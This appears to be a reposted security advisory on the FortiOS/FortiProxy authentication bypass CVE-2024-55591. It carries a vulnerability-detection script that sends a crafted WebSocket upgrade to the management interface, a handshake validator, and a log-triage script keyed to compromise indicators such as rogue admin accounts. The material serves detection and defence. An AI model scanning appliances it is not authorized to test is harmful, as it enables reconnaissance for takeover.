CVE-2024-55591 | FortiOS and FortiProxy Authentication Bypass Vulnerability (POC)

alicy 信安百科 2025-01-18 10:00

0x00 Preface

FortiOS is the security operating system that Fortinet (USA) develops for its FortiGate network security platform. It bundles a firewall, IPsec VPN, SSL-VPN, IPS, antivirus, web filtering, anti-spam, application control (instant messaging and P2P) and bandwidth control.

FortiProxy is Fortinet's high-performance secure web proxy. It combines web filtering, DNS filtering, DLP, antivirus, intrusion prevention and advanced threat protection to shield users from network attacks.

0x01 Vulnerability Description

An unauthenticated remote attacker can send crafted requests to the Node.js websocket module of the management interface; successful exploitation grants super-admin privileges. The vendor advisory (FG-IR-24-535) classifies the flaw as CWE-288, authentication bypass using an alternate path or channel, and reports that it has been exploited in the wild. The precondition is that the HTTP/HTTPS administrative interface is reachable by the attacker, which is why Fortinet's workaround is to disable that interface or restrict access to it with local-in policies.
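The bypass is reached through a WebSocket upgrade on the management interface, so a scanner that probes for it sends an RFC 6455 handshake and looks at the reply. The following is an added example, not code from this article nor from watchTowr's tool, that builds the raw upgrade request and checks that a 101 reply is a genuine WebSocket handshake by recomputing Sec-WebSocket-Accept from the client key. That is stricter than accepting any 101 with an Upgrade header, which an intermediary can also produce. The three sample responses are constructed for the example; the key and accept value come from the worked example in RFC 6455 section 1.3, and the host and path are placeholders.

```python
import base64
import hashlib

# RFC 6455 section 4.2.2: the server concatenates the client key with this GUID,
# SHA-1 hashes the result and base64-encodes the digest to form Sec-WebSocket-Accept.
WS_GUID = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"


def expected_accept(client_key: str) -> str:
    """Sec-WebSocket-Accept a compliant server must return for client_key."""
    digest = hashlib.sha1((client_key + WS_GUID).encode("ascii")).digest()
    return base64.b64encode(digest).decode("ascii")


def build_upgrade_request(host: str, path: str, client_key: str) -> bytes:
    """Raw HTTP/1.1 upgrade request carrying the same headers a scanner sends."""
    lines = [
        f"GET {path} HTTP/1.1",
        f"Host: {host}",
        "Connection: keep-alive, Upgrade",
        "Upgrade: websocket",
        "Sec-WebSocket-Version: 13",
        f"Sec-WebSocket-Key: {client_key}",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("ascii")


def parse_response_head(raw: bytes):
    """Split an HTTP response into (status_code, {lower-cased header name: value})."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("iso-8859-1")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split(" ", 2)[1])
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers


def is_genuine_ws_upgrade(raw_response: bytes, client_key: str) -> bool:
    """True only for a 101 with Upgrade/Connection headers AND the correct accept value.

    A bare 101, or an 'Upgrade' substring in Connection, can come from a proxy in the
    path; a matching accept value proves the endpoint ran the handshake for our key.
    """
    status, headers = parse_response_head(raw_response)
    if status != 101:
        return False
    if headers.get("upgrade", "").lower() != "websocket":
        return False
    if "upgrade" not in headers.get("connection", "").lower():
        return False
    return headers.get("sec-websocket-accept") == expected_accept(client_key)


# Constructed sample responses (not captured from any device). The key/accept pair is
# the worked example from RFC 6455 section 1.3.
RFC_KEY = "dGhlIHNhbXBsZSBub25jZQ=="
GENUINE_101 = (
    b"HTTP/1.1 101 Switching Protocols\r\n"
    b"Upgrade: websocket\r\n"
    b"Connection: Upgrade\r\n"
    b"Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=\r\n\r\n"
)
BOGUS_101 = (
    b"HTTP/1.1 101 Switching Protocols\r\n"
    b"Connection: Upgrade\r\n"
    b"Upgrade: websocket\r\n\r\n"
)
LOGIN_200 = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"

if __name__ == "__main__":
    # 192.0.2.10 and the path are placeholders, not a real target.
    print(build_upgrade_request("192.0.2.10", "/watchTowr-abcdef", RFC_KEY).decode())
    print("accept for RFC key:", expected_accept(RFC_KEY))
    for label, resp in (("genuine", GENUINE_101), ("bogus", BOGUS_101), ("login", LOGIN_200)):
        print(f"{label:8s} -> genuine upgrade: {is_genuine_ws_upgrade(resp, RFC_KEY)}")
```

The accept check does not change what is being detected; it only removes a class of false positives (load balancers and reverse proxies that answer 101 without speaking WebSocket themselves) before you report a host as exposed.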

0x02 CVE ID

CVE-2024-55591

0x03 Affected Versions

```
FortiOS    7.0.0 through 7.0.16   (fixed in 7.0.17)
FortiProxy 7.0.0 through 7.0.19   (fixed in 7.0.20)
FortiProxy 7.2.0 through 7.2.12   (fixed in 7.2.13)
```

FortiOS 7.2, 7.4 and 7.6 are not affected.

0x04 Vulnerability Details


POC:  


https://github.com/watchtowrlabs/fortios-auth-bypass-check-CVE-2024-55591  

```python
import argparse
import random
import sys

import requests

banner = """\
CVE-2024-55591.py
        (*) Fortinet FortiOS Authentication Bypass (CVE-2024-55591) vulnerable detection by watchTowr

          - Sonny, watchTowr
          - Aliz Hammond, watchTowr

CVEs: [CVE-2024-55591]
"""


def generate_random_suffix(length=6):
    """Generate a random lowercase suffix so the probe path cannot match a real route."""
    return ''.join(random.choice('abcdefghijklmnopqrstuvwxyz') for _ in range(length))


def perform_web_interaction(target, port):
    """
    Perform a two-step web interaction with specific parameters.

    Args:
        target (str): Target IP address
        port (int): Target port

    Returns:
        tuple: Results of the two requests
    """
    # Construct base URL
    base_url = f"https://{target}:{port}"

    # Generate random suffix
    random_suffix = generate_random_suffix()

    # Disable SSL verification warnings (appliances almost always present self-signed certs)
    requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

    # First request - login-like endpoint, used to fingerprint the FortiOS management interface
    first_url = f"{base_url}/login?redir=/ng"
    first_response = requests.get(first_url, verify=False, timeout=10)

    # Second request - random, non-existent path carrying a WebSocket upgrade handshake
    second_url = f"{base_url}/watchTowr-{random_suffix}"
    second_headers = {
        'Sec-WebSocket-Version': '13',
        'Sec-WebSocket-Key': 'thFz/fKwzu5wDEy0XO3fcw==',
        'Connection': 'keep-alive, Upgrade',
        'Upgrade': 'websocket'
    }
    second_response = requests.get(second_url, headers=second_headers, verify=False, timeout=10)

    return first_response, second_response


def validate_interaction_conditions(first_response, second_response):
    """
    Validate specific conditions for the web interaction.

    Args:
        first_response (requests.Response): First HTTP response
        second_response (requests.Response): Second HTTP response

    Returns:
        bool: Whether all conditions are met
    """
    try:
        # Check status codes: login page is served, upgrade on a bogus path is accepted
        status_code_1_check = first_response.status_code == 200
        status_code_2_check = second_response.status_code == 101

        # Check body contents for first response (FortiOS GUI markers; literal tags
        # as in the upstream watchTowr script linked above)
        html_main_app_check = '<html class="main-app">' in first_response.text
        f_icon_warning_check = '<f-icon class="fa-warning' in first_response.text
        f_icon_closing_check = '</f-icon>' in first_response.text

        body_checks = html_main_app_check and f_icon_warning_check and f_icon_closing_check

        # Check for specific header marker (FortiOS session cookie name prefix)
        header_marker_check = any('APSCOOKIE_' in str(header) for header in first_response.headers.values())

        # Check connection upgrade for second response
        connection_upgrade_check = 'Upgrade' in second_response.headers.get('Connection', '')

        # Print detailed information about first response matchers
        if not html_main_app_check:
            print("[!] Target is not a FortiOS Management Interface")
            sys.exit(1)

        if not f_icon_warning_check:
            print("[!] '<f-icon class=\"fa-warning\"' not found in response")

        # Combine all checks
        return all([
            status_code_1_check,
            status_code_2_check,
            body_checks,
            header_marker_check,
            connection_upgrade_check
        ])
    except Exception as e:
        print(f"[!] Error during validation: {e}")
        return False


def main():
    """
    Main function to run the web interaction checks.
    """
    print(banner)

    parser = argparse.ArgumentParser(description='CVE-2024-55591 Detection Tool')
    parser.add_argument('--target', '-t', type=str, help='IP address of the target', required=True)
    parser.add_argument('--port', '-p', type=int, help='Port of the target', required=False, default=443)
    args = parser.parse_args()

    try:
        print(f"[*] Targeting: https://{args.target}:{args.port}")
        first_response, second_response = perform_web_interaction(args.target, args.port)

        result = validate_interaction_conditions(first_response, second_response)

        if result:
            print("[!] VULNERABLE: All conditions were met")
        else:
            print("[*] NOT VULNERABLE: Conditions were not satisfied")

    except requests.RequestException as e:
        print(f"[!] Request error: {e}")
    except Exception as e:
        print(f"[!] Unexpected error: {e}")


if __name__ == "__main__":
    main()
```
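The script above tells you whether a device is still exposed; it says nothing about whether it was already abused. FG-IR-24-535 lists, as indicators of compromise, successful admin logins recorded with ui/method jsconsole from source addresses that are not the administrator's (loopback and arbitrary public addresses appear), followed by configuration changes such as new system.admin accounts made through jsconsole. The following is an added example, not code from this article or from Fortinet, that triages FortiOS event/system log lines for those two patterns. The log lines are constructed for the example in the FortiOS key=value format (the account name xqzyt and the timestamps are made up), and the trusted administrator network 203.0.113.0/24 is an assumption an operator would replace with their own.

```python
import ipaddress
import re

# FortiOS event logs are space-separated key=value pairs; values may be double-quoted.
KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')

# Constructed sample lines (not real captures). Line 1 is an ordinary GUI login;
# lines 2-3 follow the post-exploitation pattern described in FG-IR-24-535.
SAMPLE_LOGS = [
    'date=2025-01-10 time=09:12:01 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Admin login successful" user="admin" ui="https(203.0.113.7)" method="https" '
    'srcip=203.0.113.7 action="login" status="success" profile="super_admin"',
    'date=2025-01-10 time=09:15:44 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Admin login successful" user="admin" ui="jsconsole" method="jsconsole" '
    'srcip=1.1.1.1 dstip=1.1.1.1 action="login" status="success" profile="super_admin"',
    'date=2025-01-10 time=09:16:02 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Object attribute configured" user="admin" ui="jsconsole(127.0.0.1)" action="Add" '
    'cfgpath="system.admin" cfgobj="xqzyt" cfgattr="password[*]accprofile[super_admin]vdom[root]"',
]


def parse_fortios_log(line: str) -> dict:
    """Parse one key=value log line into a dict, stripping surrounding quotes."""
    fields = {}
    for key, value in KV_RE.findall(line):
        if len(value) >= 2 and value[0] == '"' and value[-1] == '"':
            value = value[1:-1]
        fields[key] = value
    return fields


def in_trusted(ip: str, trusted_nets) -> bool:
    """True if ip parses and lies inside one of the trusted admin networks."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in trusted_nets)


def triage(lines, trusted_admin_nets):
    """Return [(line_no, reason)] for lines matching the CVE-2024-55591 abuse pattern.

    trusted_admin_nets: CIDR strings for where administrators legitimately log in from
    (operator-supplied assumption). jsconsole logins from anywhere else are flagged, as
    are admin accounts added through jsconsole regardless of source.
    """
    nets = [ipaddress.ip_network(n) for n in trusted_admin_nets]
    hits = []
    for no, line in enumerate(lines, 1):
        f = parse_fortios_log(line)
        if f.get("type") != "event" or f.get("subtype") != "system":
            continue
        via_jsconsole = f.get("ui", "").startswith("jsconsole") or f.get("method") == "jsconsole"
        if not via_jsconsole:
            continue
        if f.get("logdesc") == "Admin login successful" and f.get("status") == "success":
            src = f.get("srcip", "")
            if not in_trusted(src, nets):
                hits.append((no, f"jsconsole login as {f.get('user')} from untrusted srcip {src}"))
        if f.get("cfgpath") == "system.admin" and f.get("action") == "Add":
            hits.append((no, f"admin account {f.get('cfgobj')} added via jsconsole ({f.get('cfgattr')})"))
    return hits


if __name__ == "__main__":
    for no, reason in triage(SAMPLE_LOGS, ["203.0.113.0/24"]):
        print(f"line {no}: {reason}")
```

Legitimate use of the GUI's CLI console also logs with ui="jsconsole", so the source-address allowlist is what separates an administrator at the console from an attacker riding the websocket path; a new super_admin account created through jsconsole is worth a ticket on its own.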

0x05 References

https://fortiguard.fortinet.com/psirt/FG-IR-24-535

Recommended reading:

CVE-2024-47575 | Fortinet FortiManager Improper Authentication Vulnerability

CVE-2024-21762 | Fortinet FortiOS & FortiProxy Out-of-Bounds Write Vulnerability

Fortinet FortiOS sslvpnd Remote Code Execution Vulnerability

PS: Domestic and international security highlights; sharing and reposting are welcome, please keep the article intact. If the article contains sensitive information or infringing content, contact the author to have it removed. Information security is a long road; thank you for your support.

The articles and tools on this public account are provided for learning and reference only. The user alone is responsible for any direct or indirect consequences or damage arising from distributing or using the information in this document; this public account and the article's author accept no liability for it.